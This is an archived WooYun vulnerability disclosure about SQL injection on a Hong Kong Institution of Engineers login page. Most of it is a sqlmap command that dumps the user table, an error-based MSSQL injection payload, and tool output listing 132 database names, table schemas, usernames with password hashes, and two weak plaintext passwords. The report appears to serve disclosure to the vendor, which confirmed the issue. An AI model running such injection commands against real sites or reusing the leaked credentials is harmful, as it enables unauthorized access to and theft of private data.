乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-12: 细节已通知厂商并且等待厂商处理中 2015-10-15: 厂商已经确认,细节仅向厂商公开 2015-10-25: 细节向核心白帽子及相关领域专家公开 2015-11-04: 细节向普通白帽子公开 2015-11-14: 细节向实习白帽子公开 2015-11-29: 细节向公众公开
香港工程师学会某处存在SQL注入漏洞+后台弱密码(132个库)
使用sqlmap进行测试:测试地址:http://**.**.**.**/login.aspx
python sqlmap.py -u "http://**.**.**.**/login.aspx" --form --batch -p UsrID --technique=E -D HKIE_AC -T tb_Usr -C Usr_name,Usr_pwd --dump
弱密码:1. jimmy:000000002. W C LO:drwclo
---Parameter: UsrID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUJNzc3OTI0NjM5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIYnRubG9naW79t+jTuJcfBVV7mqLjckooBfnAsg==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEWBQK7643hCAL1sK+0CwLmmdGVDALIvNOaAQKC3IfLCZn65Pt3vL2j2d/jloghC1RnzTlm&UsrID=nSUi' AND 7221=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7221=7221) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(120)+CHAR(113))) AND 'RNLY'='RNLY&Pwd=&Organizer=RWwO&btnlogin.x=1&btnlogin.y=1---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005
available databases [132]:[*] AIC[*] ATCACC_ATM[*] ATCACC_ATM1[*] ATCACC_ATM2[*] ATCACC_ATM3[*] ATCACC_ATM_Global[*] ATCACC_ATMI[*] ATCACC_BJ[*] ATCACC_BJ01[*] ATCACC_BVI[*] ATCACC_CD[*] ATCACC_CQ[*] ATCACC_DL[*] ATCACC_DL01[*] ATCACC_GZ[*] ATCACC_GZ01[*] ATCACC_HK[*] ATCACC_QD[*] ATCACC_QD01[*] ATCACC_SH[*] ATCACC_SH01[*] ATCACC_SSH[*] ATCACC_SZ[*] ATCACC_TJ[*] ATCACC_TJ01[*] ATCACC_TW[*] ATCACC_XI[*] ATCACC_XI01[*] ATCMaster[*] Baby[*] bsp[*] BspGbl[*] chaumet[*] CheerArt[*] chm[*] clinique[*] COLON_CONTENT_CMT[*] COLON_CONTENT_CMT1[*] COLON_CONTENT_CMT3[*] epdweee[*] Forums_OZ[*] FTMltd[*] goldsource[*] guess_test[*] guess_travel[*] Guesshandbags[*] hierarchy[*] HKBA[*] HKBA_20150122_Bak[*] HKBA_data[*] hkba_help[*] hkba_web[*] hkba_web2[*] HKBA_WEB_Live[*] hkba_web_uat[*] hkba_webtest[*] HkbaAccount[*] HKBAFocus[*] HKBAWEB[*] HKElectric[*] HKElectric_uat[*] HKIE-FEdigest[*] HKIE_AC[*] HKIE_AMC[*] HKIE_BD[*] hkie_bk[*] HKIE_BM[*] HKIE_BS[*] HKIE_BS_DynamicMenu[*] HKIE_CA[*] HKIE_CMT[*] HKIE_CPDS[*] HKIE_CV[*] HKIE_CV_20131029[*] HKIE_CV_TEST[*] HKIE_EG[*] HKIE_EG_TEST[*] HKIE_Electrical[*] HKIE_Electrical_new[*] HKIE_EN[*] HKIE_EV[*] HKIE_EV_ForEVTestWebSite[*] HKIE_FE[*] HKIE_FE_Copy20100108[*] HKIE_FE_ForFETestWebSite[*] HKIE_LT[*] HKIE_MC[*] HKIE_MC_backUpAt2010_03_12[*] HKIE_MI[*] HKIE_MT[*] HKIE_NE[*] HKIE_NE_Bak_2009_11_30[*] HKIE_SSC[*] HKIE_ST[*] HKIE_TEMP_DB[*] hkie_YMC[*] hkmta[*] HLS[*] hls_temp[*] HLSnew[*] imss[*] imsseuq[*] innoways_edm[*] jimmy[*] kifung_CMT[*] Kingdom_CMT[*] master[*] MMS[*] mms_test[*] model[*] msdb[*] mta_test[*] nano[*] OP-2[*] op_intranet_new[*] origins_quota[*] PCCW_CTRWS[*] PCCW_CTRWS_CHK[*] pccw_quota[*] pccw_quota_sim[*] policy_demo[*] processis[*] QASWEB_TEMP[*] superdefense[*] t-marketing[*] tempdb[*] Vanny[*] Vote[*] wellonmedical[*] WineDining[*] wontrad[*] wuyishan
Database: HKIE_AC[16 tables]+-----------------------+| tb_DocUpload || tb_Event || tb_EventGroupType || tb_LeftMenu || tb_LeftSubMenu || tb_News || tb_PageContent || tb_PageContentSetting || tb_PastSession || tb_PastSessionType || tb_Photo || tb_PhotoAlbum || tb_S_Doc || tb_S_DocType || tb_Usr || tb_event_reply_from |+-----------------------+
Table: tb_Usr[10 columns]+------------+----------+| Column | Type |+------------+----------+| Crt_by | varchar || Crt_dte | datetime || Email_adds | varchar || Is_Enable | char || Staff_name | varchar || Tel | varchar || Update_by | varchar || Update_dte | datetime || Usr_name | varchar || Usr_pwd | varchar |+------------+----------+
Table: tb_Usr[3 entries]+----------+--------------------------+| Usr_name | Usr_pwd |+----------+--------------------------+| jimmy | 3Ush6e9x4SkRg6RrkTrm8g== || W C LO | CJgGly+9rN5dcsNjmlEeJw== || admin | H0SAi4swyo2o6p1FTf1U+w== |+----------+--------------------------+
增加过滤。
危害等级:高
漏洞Rank:14
确认时间:2015-10-15 17:42
已聯絡相關機構處理
暂无